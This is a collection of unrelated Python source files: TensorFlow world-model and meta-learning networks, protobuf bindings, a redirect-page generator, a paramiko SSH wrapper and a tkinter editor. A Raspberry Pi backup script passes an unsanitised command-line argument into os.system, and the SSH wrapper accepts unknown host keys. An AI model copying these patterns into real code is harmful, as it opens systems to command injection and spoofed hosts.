prior = common.static_scan(self.img_step, action, state)
prior = {k: swap(v) for k, v in prior.items()}
return prior
def get_feat(self, state):
stoch = self._cast(state['stoch'])
if self._discrete:
shape = stoch.shape[:-2] + [self._stoch * self._discrete]
stoch = tf.reshape(stoch, shape)
return tf.concat([stoch, state['deter']], -1)
def get_dist(self, state, ensemble=False):
if ensemble:
state = self._suff_stats_ensemble(state['deter'])
if self._discrete:
logit = state['logit']
logit = tf.cast(logit, tf.float32)
dist = tfd.Independent(common.OneHotDist(logit), 2)
else:
mean, std = state['mean'], state['std']
mean = tf.cast(mean, tf.float32)
std = tf.cast(std, tf.float32)
dist = tfd.MultivariateNormalDiag(mean, std)
return dist
@tf.function
def obs_step(self, prev_state, prev_action, embed, is_first, sample=True):
# if is_first.any():
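    # Zero out the previous state and action wherever is_first is set, so a new episode
    # starts from the zero initial state instead of carrying latent state across the boundary.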
prev_state, prev_action = tf.nest.map_structure(
lambda x: tf.einsum(
'b,b...->b...', 1.0 - is_first.astype(x.dtype), x),
(prev_state, prev_action))
prior = self.img_step(prev_state, prev_action, sample)
x = tf.concat([prior['deter'], embed], -1)
x = self.get('obs_out', tfkl.Dense, self._hidden)(x)
x = self.get('obs_out_norm', NormLayer, self._norm)(x)
x = self._act(x)
stats = self._suff_stats_layer('obs_dist', x)
dist = self.get_dist(stats)
stoch = dist.sample() if sample else dist.mode()
post = {'stoch': stoch, 'deter': prior['deter'], **stats}
return post, prior
@tf.function
def img_step(self, prev_state, prev_action, sample=True):
prev_stoch = self._cast(prev_state['stoch'])
prev_action = self._cast(prev_action)
if self._discrete:
shape = prev_stoch.shape[:-2] + [self._stoch * self._discrete]
prev_stoch = tf.reshape(prev_stoch, shape)
x = tf.concat([prev_stoch, prev_action], -1)
x = self.get('img_in', tfkl.Dense, self._hidden)(x)
x = self.get('img_in_norm', NormLayer, self._norm)(x)
x = self._act(x)
deter = prev_state['deter']
x, deter = self._cell(x, [deter])
deter = deter[0] # Keras wraps the state in a list.
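    # The prior statistics come from an ensemble of output heads; one member is drawn
    # uniformly at random for this step (with ensemble=1 this reduces to a single prior head).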
stats = self._suff_stats_ensemble(x)
index = tf.random.uniform((), 0, self._ensemble, tf.int32)
stats = {k: v[index] for k, v in stats.items()}
dist = self.get_dist(stats)
stoch = dist.sample() if sample else dist.mode()
prior = {'stoch': stoch, 'deter': deter, **stats}
return prior
def _suff_stats_ensemble(self, inp):
bs = list(inp.shape[:-1])
inp = inp.reshape([-1, inp.shape[-1]])
stats = []
for k in range(self._ensemble):
x = self.get(f'img_out_{k}', tfkl.Dense, self._hidden)(inp)
x = self.get(f'img_out_norm_{k}', NormLayer, self._norm)(x)
x = self._act(x)
stats.append(self._suff_stats_layer(f'img_dist_{k}', x))
stats = {
k: tf.stack([x[k] for x in stats], 0)
for k, v in stats[0].items()}
stats = {
k: v.reshape([v.shape[0]] + bs + list(v.shape[2:]))
for k, v in stats.items()}
return stats
def _suff_stats_layer(self, name, x):
if self._discrete:
x = self.get(name, tfkl.Dense, self._stoch * self._discrete, None)(x)
logit = tf.reshape(x, x.shape[:-1] + [self._stoch, self._discrete])
return {'logit': logit}
else:
x = self.get(name, tfkl.Dense, 2 * self._stoch, None)(x)
mean, std = tf.split(x, 2, -1)
std = {
'softplus': lambda: tf.nn.softplus(std),
'sigmoid': lambda: tf.nn.sigmoid(std),
'sigmoid2': lambda: 2 * tf.nn.sigmoid(std / 2),
}[self._std_act]()
std = std + self._min_std
return {'mean': mean, 'std': std}
def kl_loss(self, post, prior, forward, balance, free, free_avg):
kld = tfd.kl_divergence
sg = lambda x: tf.nest.map_structure(tf.stop_gradient, x)
lhs, rhs = (prior, post) if forward else (post, prior)
mix = balance if forward else (1 - balance)
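    # KL balancing: when balance != 0.5 the divergence is computed twice, each time with
    # the gradient stopped through one of the two distributions, and the two copies are
    # mixed by `balance` so prior and posterior are pulled towards each other at different rates.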
if balance == 0.5:
value = kld(self.get_dist(lhs), self.get_dist(rhs))
loss = tf.maximum(value, free).mean()
else:
value_lhs = value = kld(self.get_dist(lhs), self.get_dist(sg(rhs)))
value_rhs = kld(self.get_dist(sg(lhs)), self.get_dist(rhs))
if free_avg:
loss_lhs = tf.maximum(value_lhs.mean(), free)
loss_rhs = tf.maximum(value_rhs.mean(), free)
else:
loss_lhs = tf.maximum(value_lhs, free).mean()
loss_rhs = tf.maximum(value_rhs, free).mean()
loss = mix * loss_lhs + (1 - mix) * loss_rhs
return loss, value
class Encoder(common.Module):
def __init__(
self, shapes, cnn_keys=r'.*', mlp_keys=r'.*', act='elu', norm='none',
cnn_depth=48, cnn_kernels=(4, 4, 4, 4), mlp_layers=[400, 400, 400, 400]):
self.shapes = shapes
self.cnn_keys = [
k for k, v in shapes.items() if re.match(cnn_keys, k) and len(v) == 3]
self.mlp_keys = [
k for k, v in shapes.items() if re.match(mlp_keys, k) and len(v) == 1]
print('Encoder CNN inputs:', list(self.cnn_keys))
print('Encoder MLP inputs:', list(self.mlp_keys))
self._act = get_act(act)
self._norm = norm
self._cnn_depth = cnn_depth
self._cnn_kernels = cnn_kernels
self._mlp_layers = mlp_layers
@tf.function
def __call__(self, data):
key, shape = list(self.shapes.items())[0]
batch_dims = data[key].shape[:-len(shape)]
data = {
k: tf.reshape(v, (-1,) + tuple(v.shape)[len(batch_dims):])
for k, v in data.items()}
outputs = []
if self.cnn_keys:
outputs.append(self._cnn({k: data[k] for k in self.cnn_keys}))
if self.mlp_keys:
outputs.append(self._mlp({k: data[k] for k in self.mlp_keys}))
output = tf.concat(outputs, -1)
return output.reshape(batch_dims + output.shape[1:])
def _cnn(self, data):
x = tf.concat(list(data.values()), -1)
x = x.astype(prec.global_policy().compute_dtype)
for i, kernel in enumerate(self._cnn_kernels):
depth = 2 ** i * self._cnn_depth
x = self.get(f'conv{i}', tfkl.Conv2D, depth, kernel, 2)(x)
x = self.get(f'convnorm{i}', NormLayer, self._norm)(x)
x = self._act(x)
return x.reshape(tuple(x.shape[:-3]) + (-1,))
def _mlp(self, data):
x = tf.concat(list(data.values()), -1)
x = x.astype(prec.global_policy().compute_dtype)
for i, width in enumerate(self._mlp_layers):
x = self.get(f'dense{i}', tfkl.Dense, width)(x)
x = self.get(f'densenorm{i}', NormLayer, self._norm)(x)
x = self._act(x)
return x
class Decoder(common.Module):
def __init__(
self, shapes, cnn_keys=r'.*', mlp_keys=r'.*', act='elu', norm='none',
cnn_depth=48, cnn_kernels=(4, 4, 4, 4), mlp_layers=[400, 400, 400, 400]):
self._shapes = shapes
self.cnn_keys = [
k for k, v in shapes.items() if re.match(cnn_keys, k) and len(v) == 3]
self.mlp_keys = [
k for k, v in shapes.items() if re.match(mlp_keys, k) and len(v) == 1]
print('Decoder CNN outputs:', list(self.cnn_keys))
print('Decoder MLP outputs:', list(self.mlp_keys))
self._act = get_act(act)
self._norm = norm
self._cnn_depth = cnn_depth
self._cnn_kernels = cnn_kernels
self._mlp_layers = mlp_layers
def __call__(self, features):
features = tf.cast(features, prec.global_policy().compute_dtype)
outputs = {}
if self.cnn_keys:
outputs.update(self._cnn(features))
if self.mlp_keys:
outputs.update(self._mlp(features))
return outputs
def _cnn(self, features):
channels = {k: self._shapes[k][-1] for k in self.cnn_keys}
ConvT = tfkl.Conv2DTranspose
x = self.get('convin', tfkl.Dense, 32 * self._cnn_depth)(features)
x = tf.reshape(x, [-1, 1, 1, 32 * self._cnn_depth])
for i, kernel in enumerate(self._cnn_kernels):
depth = 2 ** (len(self._cnn_kernels) - i - 2) * self._cnn_depth
act, norm = self._act, self._norm
if i == len(self._cnn_kernels) - 1:
depth, act, norm = sum(channels.values()), tf.identity, 'none'
x = self.get(f'conv{i}', ConvT, depth, kernel, 2)(x)
x = self.get(f'convnorm{i}', NormLayer, norm)(x)
x = act(x)
x = x.reshape(features.shape[:-1] + x.shape[1:])
means = tf.split(x, list(channels.values()), -1)
dists = {
key: tfd.Independent(tfd.Normal(mean, 1), 3)
for (key, shape), mean in zip(channels.items(), means)}
return dists
def _mlp(self, features):
shapes = {k: self._shapes[k] for k in self.mlp_keys}
x = features
for i, width in enumerate(self._mlp_layers):
x = self.get(f'dense{i}', tfkl.Dense, width)(x)
x = self.get(f'densenorm{i}', NormLayer, self._norm)(x)
x = self._act(x)
dists = {}
for key, shape in shapes.items():
dists[key] = self.get(f'dense_{key}', DistLayer, shape)(x)
return dists
class MLP(common.Module):
def __init__(self, shape, layers, units, act='elu', norm='none', **out):
self._shape = (shape,) if isinstance(shape, int) else shape
self._layers = layers
self._units = units
self._norm = norm
self._act = get_act(act)
self._out = out
def __call__(self, features):
x = tf.cast(features, prec.global_policy().compute_dtype)
x = x.reshape([-1, x.shape[-1]])
for index in range(self._layers):
x = self.get(f'dense{index}', tfkl.Dense, self._units)(x)
x = self.get(f'norm{index}', NormLayer, self._norm)(x)
x = self._act(x)
x = x.reshape(features.shape[:-1] + [x.shape[-1]])
return self.get('out', DistLayer, self._shape, **self._out)(x)
class GRUCell(tf.keras.layers.AbstractRNNCell):
def __init__(self, size, norm=False, act='tanh', update_bias=-1, **kwargs):
super().__init__()
self._size = size
self._act = get_act(act)
self._norm = norm
self._update_bias = update_bias
self._layer = tfkl.Dense(3 * size, use_bias=norm is not None, **kwargs)
if norm:
self._norm = tfkl.LayerNormalization(dtype=tf.float32)
@property
def state_size(self):
return self._size
@tf.function
def call(self, inputs, state):
state = state[0] # Keras wraps the state in a list.
parts = self._layer(tf.concat([inputs, state], -1))
if self._norm:
dtype = parts.dtype
parts = tf.cast(parts, tf.float32)
parts = self._norm(parts)
parts = tf.cast(parts, dtype)
reset, cand, update = tf.split(parts, 3, -1)
reset = tf.nn.sigmoid(reset)
cand = self._act(reset * cand)
update = tf.nn.sigmoid(update + self._update_bias)
output = update * cand + (1 - update) * state
return output, [output]
class DistLayer(common.Module):
def __init__(
self, shape, dist='mse', min_std=0.1, init_std=0.0):
self._shape = shape
self._dist = dist
self._min_std = min_std
self._init_std = init_std
def __call__(self, inputs):
out = self.get('out', tfkl.Dense, np.prod(self._shape))(inputs)
out = tf.reshape(out, tf.concat([tf.shape(inputs)[:-1], self._shape], 0))
out = tf.cast(out, tf.float32)
if self._dist in ('normal', 'tanh_normal', 'trunc_normal'):
std = self.get('std', tfkl.Dense, np.prod(self._shape))(inputs)
std = tf.reshape(std, tf.concat([tf.shape(inputs)[:-1], self._shape], 0))
std = tf.cast(std, tf.float32)
if self._dist == 'mse':
dist = tfd.Normal(out, 1.0)
return tfd.Independent(dist, len(self._shape))
if self._dist == 'normal':
dist = tfd.Normal(out, std)
return tfd.Independent(dist, len(self._shape))
if self._dist == 'binary':
dist = tfd.Bernoulli(out)
return tfd.Independent(dist, len(self._shape))
if self._dist == 'tanh_normal':
mean = 5 * tf.tanh(out / 5)
std = tf.nn.softplus(std + self._init_std) + self._min_std
dist = tfd.Normal(mean, std)
dist = tfd.TransformedDistribution(dist, common.TanhBijector())
dist = tfd.Independent(dist, len(self._shape))
return common.SampleDist(dist)
if self._dist == 'trunc_normal':
std = 2 * tf.nn.sigmoid((std + self._init_std) / 2) + self._min_std
dist = common.TruncNormalDist(tf.tanh(out), std, -1, 1)
return tfd.Independent(dist, 1)
if self._dist == 'onehot':
return common.OneHotDist(out)
raise NotImplementedError(self._dist)
class NormLayer(common.Module):
def __init__(self, name):
if name == 'none':
self._layer = None
elif name == 'layer':
self._layer = tfkl.LayerNormalization()
else:
raise NotImplementedError(name)
def __call__(self, features):
if not self._layer:
return features
return self._layer(features)
def get_act(name):
if name == 'none':
return tf.identity
if name == 'mish':
return lambda x: x * tf.math.tanh(tf.nn.softplus(x))
elif hasattr(tf.nn, name):
return getattr(tf.nn, name)
elif hasattr(tf, name):
return getattr(tf, name)
else:
raise NotImplementedError(name)
|
py | b414d212276174f5474816e64f97c3b877739fb4 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import datetime
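# Usage: python <this script> <label>; sys.argv[1] is appended to the timestamped
# archive file name created under base_path.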
base_path = '/mnt/gsuite/rasp_backup/'
backup_file = ''
backup_list_full = ['/bin','/etc','/lib','/media','/opt','/root','/sbin','/sys','/usr','/boot','/dev','/proc','/run','/srv','/tmp','/var','/home/pi']
#backup_list_full = ['/home/pi/project']
backup_file = base_path +datetime.datetime.now().strftime('%y-%m-%d_%H:%M')+ '_'+sys.argv[1] + '.tar.gz'
os.system('tar cvfz ' + backup_file + ' ' + ' '.join(backup_list_full))
|
py | b414d2982e311574e4d4bf3ebf949ff4b2e5c5e1 | from collections import OrderedDict
from functools import reduce
import numpy as np
import tensorflow as tf
from tensorflow.contrib.layers.python import layers
from boml import extension
from boml.setup_model import network_utils
from boml.setup_model.network import BOMLNet
class BOMLNetMetaReprV1(BOMLNet):
def __init__(
self,
_input,
name="BMLNetC4LMetaRepr",
outer_param_dict=OrderedDict(),
model_param_dict=OrderedDict(),
task_parameter=None,
use_T=False,
use_Warp=False,
outer_method="Reverse",
dim_output=-1,
activation=tf.nn.relu,
var_collections=extension.METAPARAMETERS_COLLECTIONS,
conv_initializer=tf.contrib.layers.xavier_initializer_conv2d(tf.float32),
output_weight_initializer=tf.contrib.layers.xavier_initializer(tf.float32),
norm=layers.batch_norm,
data_type=tf.float32,
channels=1,
dim_hidden=[64, 64, 64, 64],
kernel=3,
max_pool=False,
reuse=False,
):
self.dim_output = dim_output
self.kernel = kernel
self.channels = channels
self.dim_hidden = dim_hidden
self.datatype = data_type
self.batch_norm = norm
self.max_pool = max_pool
self.stride = [1, 2, 2, 1]
self.no_stride = [1, 1, 1, 1]
self.activation = activation
self.bias_initializer = tf.zeros_initializer(tf.float32)
self.conv_initializer = conv_initializer
self.output_weight_initializer = output_weight_initializer
self.use_T = use_T
self.use_Warp = use_Warp
self.outer_method = outer_method
self.flatten = False if self.outer_method == "Implicit" else True
super(BOMLNetMetaReprV1, self).__init__(
_input=_input,
outer_param_dict=outer_param_dict,
var_collections=var_collections,
name=name,
model_param_dict=model_param_dict,
task_parameter=task_parameter,
reuse=reuse,
)
self.betas = self.filter_vars("beta")
self.moving_means = self.filter_vars("moving_mean")
self.moving_variances = self.filter_vars("moving_variance")
if not reuse:
extension.remove_from_collection(
extension.GraphKeys.MODEL_VARIABLES, *self.moving_means
)
extension.remove_from_collection(
extension.GraphKeys.MODEL_VARIABLES, *self.moving_variances
)
print(name, "MODEL CREATED")
extension.remove_from_collection(
extension.GraphKeys.METAPARAMETERS, *self.moving_means
)
extension.remove_from_collection(
extension.GraphKeys.METAPARAMETERS, *self.moving_variances
)
def create_outer_parameters(self):
for i in range(len(self.dim_hidden)):
self.outer_param_dict["conv" + str(i)] = network_utils.get_conv_weight(
self, layer=i, initializer=self.conv_initializer
)
self.outer_param_dict["bias" + str(i)] = network_utils.get_bias_weight(
self, layer=i, initializer=self.bias_initializer
)
[
tf.add_to_collections(extension.GraphKeys.METAPARAMETERS, hyper)
for hyper in self.outer_param_dict.values()
]
if len(self.model_param_dict) == 0 and callable(
getattr(self, "create_model_parameters", None)
):
self.create_model_parameters()
return self.outer_param_dict
def create_model_parameters(
self, var_collections=extension.GraphKeys.METAPARAMETERS
):
if self.use_T:
# hyper parameters of transformation layer
for i in range(len(self.dim_hidden)):
self.model_param_dict[
"conv" + str(i) + "_z"
] = network_utils.get_identity(
self.dim_hidden[0], name="conv" + str(i) + "_z", conv=True
)
elif self.use_Warp:
for i in range(len(self.dim_hidden)):
self.model_param_dict[
"conv" + str(i) + "_z"
] = network_utils.get_warp_weight(
self, layer=i, initializer=self.conv_initializer
)
self.model_param_dict[
"bias" + str(i) + "_z"
] = network_utils.get_warp_bias(
self, layer=i, initializer=self.bias_initializer
)
[
tf.add_to_collections(var_collections, model_param)
for model_param in self.model_param_dict.values()
]
return self.model_param_dict
def _forward(self):
"""
for i in range(4):
self.conv_layer(filters=self.dim_hidden[i],stride=self.stride, max_pool=self.max_pool)
flattened_shape = reduce(lambda a, v: a * v, self.layers[-1].get_shape().as_list()[1:])
self + tf.reshape(self.out, shape=(-1, flattened_shape), name='representation')
"""
for i in range(len(self.dim_hidden)):
if self.use_T:
self + network_utils.conv_block_t(
self,
self.outer_param_dict["conv" + str(i)],
self.outer_param_dict["bias" + str(i)],
self.model_param_dict["conv" + str(i) + "_z"],
)
elif self.use_Warp:
self + network_utils.conv_block_warp(
self,
self.outer_param_dict["conv" + str(i)],
self.outer_param_dict["bias" + str(i)],
self.model_param_dict["conv" + str(i) + "_z"],
self.model_param_dict["bias" + str(i) + "_z"],
)
else:
self + network_utils.conv_block(
self,
self.outer_param_dict["conv" + str(i)],
self.outer_param_dict["bias" + str(i)],
)
if self.flatten:
flattened_shape = reduce(
lambda a, v: a * v, self.layers[-1].get_shape().as_list()[1:]
)
self + tf.reshape(
self.out, shape=(-1, flattened_shape), name="representation"
)
else:
if self.max_pool:
self + tf.reshape(
self.out,
[-1, np.prod([int(dim) for dim in self.out.get_shape()[1:]])],
)
else:
self + tf.reduce_mean(self.out, [1, 2])
def re_forward(self, new_input):
return BOMLNetMetaReprV1(
_input=new_input if new_input is not None else self.layers[0],
name=self.name,
activation=self.activation,
outer_param_dict=self.outer_param_dict,
model_param_dict=self.model_param_dict,
dim_output=self.dim_output,
task_parameter=self.task_parameter,
use_Warp=self.use_Warp,
use_T=self.use_T,
var_collections=self.var_collections,
dim_hidden=self.dim_hidden,
output_weight_initializer=self.output_weight_initializer,
max_pool=self.max_pool,
reuse=True,
outer_method=self.outer_method,
)
def BOMLNetOmniglotMetaReprV1(
_input,
outer_param_dict=OrderedDict(),
model_param_dict=OrderedDict(),
batch_norm=layers.batch_norm,
name="BMLNetC4LOmniglot",
use_T=False,
dim_output=-1,
use_Warp=False,
outer_method="Reverse",
**model_args
):
return BOMLNetMetaReprV1(
_input=_input,
name=name,
model_param_dict=model_param_dict,
dim_output=dim_output,
outer_param_dict=outer_param_dict,
norm=batch_norm,
use_T=use_T,
use_Warp=use_Warp,
outer_method=outer_method,
**model_args
)
def BOMLNetMiniMetaReprV1(
_input,
outer_param_dict=OrderedDict(),
model_param_dict=OrderedDict(),
dim_output=-1,
batch_norm=layers.batch_norm,
name="BOMLNetC4LMini",
use_T=False,
use_Warp=False,
outer_method="Reverse",
**model_args
):
return BOMLNetMetaReprV1(
_input=_input,
name=name,
use_T=use_T,
use_Warp=use_Warp,
dim_output=dim_output,
outer_param_dict=outer_param_dict,
model_param_dict=model_param_dict,
norm=batch_norm,
channels=3,
dim_hidden=[32, 32, 32, 32],
max_pool=True,
outer_method=outer_method,
**model_args
)
|
py | b414d48bea07308b90eef5a04b16ef22f112d6d7 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: Trd_UpdateOrderFill.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
import Common_pb2 as Common__pb2
import Trd_Common_pb2 as Trd__Common__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='Trd_UpdateOrderFill.proto',
package='Trd_UpdateOrderFill',
syntax='proto2',
serialized_pb=_b('\n\x19Trd_UpdateOrderFill.proto\x12\x13Trd_UpdateOrderFill\x1a\x0c\x43ommon.proto\x1a\x10Trd_Common.proto\"V\n\x03S2C\x12%\n\x06header\x18\x01 \x02(\x0b\x32\x15.Trd_Common.TrdHeader\x12(\n\torderFill\x18\x02 \x02(\x0b\x32\x15.Trd_Common.OrderFill\"i\n\x08Response\x12\x15\n\x07retType\x18\x01 \x02(\x05:\x04-400\x12\x0e\n\x06retMsg\x18\x02 \x01(\t\x12\x0f\n\x07\x65rrCode\x18\x03 \x01(\x05\x12%\n\x03s2c\x18\x04 \x01(\x0b\x32\x18.Trd_UpdateOrderFill.S2CBI\n\x13\x63om.futu.openapi.pbZ2github.com/futuopen/ftapi4go/pb/trdupdateorderfill')
,
dependencies=[Common__pb2.DESCRIPTOR,Trd__Common__pb2.DESCRIPTOR,])
_S2C = _descriptor.Descriptor(
name='S2C',
full_name='Trd_UpdateOrderFill.S2C',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='header', full_name='Trd_UpdateOrderFill.S2C.header', index=0,
number=1, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='orderFill', full_name='Trd_UpdateOrderFill.S2C.orderFill', index=1,
number=2, type=11, cpp_type=10, label=2,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=82,
serialized_end=168,
)
_RESPONSE = _descriptor.Descriptor(
name='Response',
full_name='Trd_UpdateOrderFill.Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='retType', full_name='Trd_UpdateOrderFill.Response.retType', index=0,
number=1, type=5, cpp_type=1, label=2,
has_default_value=True, default_value=-400,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='retMsg', full_name='Trd_UpdateOrderFill.Response.retMsg', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='errCode', full_name='Trd_UpdateOrderFill.Response.errCode', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='s2c', full_name='Trd_UpdateOrderFill.Response.s2c', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=170,
serialized_end=275,
)
_S2C.fields_by_name['header'].message_type = Trd__Common__pb2._TRDHEADER
_S2C.fields_by_name['orderFill'].message_type = Trd__Common__pb2._ORDERFILL
_RESPONSE.fields_by_name['s2c'].message_type = _S2C
DESCRIPTOR.message_types_by_name['S2C'] = _S2C
DESCRIPTOR.message_types_by_name['Response'] = _RESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
S2C = _reflection.GeneratedProtocolMessageType('S2C', (_message.Message,), dict(
DESCRIPTOR = _S2C,
__module__ = 'Trd_UpdateOrderFill_pb2'
# @@protoc_insertion_point(class_scope:Trd_UpdateOrderFill.S2C)
))
_sym_db.RegisterMessage(S2C)
Response = _reflection.GeneratedProtocolMessageType('Response', (_message.Message,), dict(
DESCRIPTOR = _RESPONSE,
__module__ = 'Trd_UpdateOrderFill_pb2'
# @@protoc_insertion_point(class_scope:Trd_UpdateOrderFill.Response)
))
_sym_db.RegisterMessage(Response)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\023com.futu.openapi.pbZ2github.com/futuopen/ftapi4go/pb/trdupdateorderfill'))
# @@protoc_insertion_point(module_scope)
|
py | b414d4cc9fa72d596185f762e840da4fc6c8e11e | #!/usr/bin/env python3
import csv
from pathlib import Path
site="https://www.digital-land.info/"
dataset = Path().cwd().name
print("dataset:", dataset)
def redirect(path, to):
Path(path).parent.mkdir(parents=True, exist_ok=True)
with open(path, 'w') as f:
f.write('<meta http-equiv="refresh" content="0; url=%s%s">' % (site, to))
redirect("./docs/index.html", "dataset/%s" % dataset)
for row in csv.DictReader(open("../entity-builder/dataset/entity.csv")):
if row["dataset"] != dataset:
continue
path = Path("./docs/%s/%s/index.html" % (dataset, row["reference"]))
redirect(path, "entity/" + row["entity"])
|
py | b414d4ee5daee3bee3e0ad3fa74608b5783a1cf5 | import paramiko
import time
import socket
class SshClient:
def __init__(self, host, user, password):
self._host = host
self._user = user
self._password = password
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy)
# try:
self.client.connect(self._host, username=self._user, password=self._password)
# except paramiko.SshException, exception:
# raise exception
# except paramiko.AuthenticationException, exception:
# message = "SshClient.__init__ failed to authenticate with private key" + exception
# raise paramiko.AuthenticationException(message)
def execute(self, command):
if self.client:
stdin, stdout, stderr = self.client.exec_command(command)
# wait for a command is completed
while not stdout.channel.exit_status_ready():
time.sleep(1)
# get status
execution_status = stdout.channel.recv_exit_status()
if execution_status == 0:
                print('Command:[ {} ] executed successfully'.format(command))
return stdout.read().splitlines()
else:
                print('Error appears during execution. Error code:{}'.format(execution_status))
return stderr.read().splitlines()
else:
raise Exception("Can't execute command cause no SSH Connection")
def close(self):
if self.client:
self.client.close()
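# Example usage (illustrative host and credentials; execute() returns the command's
# output as a list of lines):
#   client = SshClient('192.168.1.10', 'pi', 'raspberry')
#   for line in client.execute('uname -a'):
#       print(line)
#   client.close()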
|
py | b414d563b5f9a597ab9eea23ec04d4ff4e103e03 | import tkinter as tk
from tkinter import ttk
from tkinter import font, colorchooser, filedialog, messagebox
import os
"""
Creator = vinod kumar
Email = [email protected]
Date = 29/07/2019 10:35
"""
main_application = tk.Tk()
main_application.geometry('1200x800')
main_application.title('Text Editor')
main_application.wm_iconbitmap('icon.ico')
############################################## main menu ###################################################
# -------------------------------------&&&&&&&& End main menu &&&&&&&&&&& ----------------------------------
main_menu = tk.Menu()
#file icons
new_icon = tk.PhotoImage(file='icons2/new.png')
open_icon = tk.PhotoImage(file='icons2/open.png')
save_icon = tk.PhotoImage(file='icons2/save.png')
save_as_icon = tk.PhotoImage(file='icons2/save_as.png')
exit_icon = tk.PhotoImage(file='icons2/exit.png')
file = tk.Menu(main_menu, tearoff=False)
#####edit
#edit icons
copy_icon = tk.PhotoImage(file='icons2/copy.png')
paste_icon = tk.PhotoImage(file='icons2/paste.png')
cut_icon = tk.PhotoImage(file='icons2/cut.png')
clear_all_icon = tk.PhotoImage(file='icons2/clear_all.png')
find_icon = tk.PhotoImage(file='icons2/find.png')
edit = tk.Menu(main_menu, tearoff=False)
######## view icons
tool_bar_icon = tk.PhotoImage(file='icons2/tool_bar.png')
status_bar_icon = tk.PhotoImage(file='icons2/status_bar.png')
view = tk.Menu(main_menu, tearoff=False)
######## color theme
light_default_icon = tk.PhotoImage(file='icons2/light_default.png')
light_plus_icon = tk.PhotoImage(file='icons2/light_plus.png')
dark_icon = tk.PhotoImage(file='icons2/dark.png')
red_icon = tk.PhotoImage(file='icons2/red.png')
monokai_icon = tk.PhotoImage(file='icons2/monokai.png')
night_blue_icon = tk.PhotoImage(file='icons2/night_blue.png')
color_theme = tk.Menu(main_menu, tearoff=False)
theme_choice = tk.StringVar()
color_icons = (light_default_icon, light_plus_icon, dark_icon, red_icon, monokai_icon, night_blue_icon)
color_dict = {
'Light Default ' : ('#000000', '#ffffff'),
'Light Plus' : ('#474747', '#e0e0e0'),
'Dark' : ('#c4c4c4', '#2d2d2d'),
'Red' : ('#2d2d2d', '#ffe8e8'),
'Monokai' : ('#d3b774', '#474747'),
'Night Blue' :('#ededed', '#6b9dc2')
}
# cascade
main_menu.add_cascade(label='File', menu=file)
main_menu.add_cascade(label='Edit', menu=edit)
main_menu.add_cascade(label='View', menu=view)
main_menu.add_cascade(label='Color Theme', menu=color_theme)
############################################## toolbar ###################################################
tool_bar = ttk.Label(main_application)
tool_bar.pack(side=tk.TOP, fill=tk.X)
## font box
font_tuple = tk.font.families()
font_family = tk.StringVar()
font_box = ttk.Combobox(tool_bar, width=30, textvariable=font_family, state='readonly')
font_box['values'] = font_tuple
font_box.current(font_tuple.index('Arial'))
font_box.grid(row=0, column=0, padx=5)
## size box
size_var = tk.IntVar()
font_size = ttk.Combobox(tool_bar, width=14, textvariable = size_var, state='readonly')
font_size['values'] = tuple(range(8,81))
font_size.current(4)
font_size.grid(row=0, column=1, padx=5)
## bold button
bold_icon = tk.PhotoImage(file='icons2/bold.png')
bold_btn = ttk.Button(tool_bar, image=bold_icon)
bold_btn.grid(row=0, column=2, padx=5)
## italic button
italic_icon = tk.PhotoImage(file='icons2/italic.png')
italic_btn = ttk.Button(tool_bar, image=italic_icon)
italic_btn.grid(row=0, column=3, padx=5)
## underline button
underline_icon = tk.PhotoImage(file='icons2/underline.png')
underline_btn = ttk.Button(tool_bar, image = underline_icon)
underline_btn.grid(row = 0, column=4, padx=5)
## font color button
font_color_icon = tk.PhotoImage(file='icons2/font_color.png')
font_color_btn = ttk.Button(tool_bar, image=font_color_icon)
font_color_btn.grid(row=0, column=5,padx=5)
## align left
align_left_icon = tk.PhotoImage(file='icons2/align_left.png')
align_left_btn = ttk.Button(tool_bar, image=align_left_icon)
align_left_btn.grid(row=0, column=6, padx=5)
## align center
align_center_icon = tk.PhotoImage(file='icons2/align_center.png')
align_center_btn = ttk.Button(tool_bar, image=align_center_icon)
align_center_btn.grid(row=0, column=7, padx=5)
## align right
align_right_icon = tk.PhotoImage(file='icons2/align_right.png')
align_right_btn = ttk.Button(tool_bar, image=align_right_icon)
align_right_btn.grid(row=0, column=8, padx=5)
# -------------------------------------&&&&&&&& End toolbar &&&&&&&&&&& ----------------------------------
############################################## text editor ###################################################
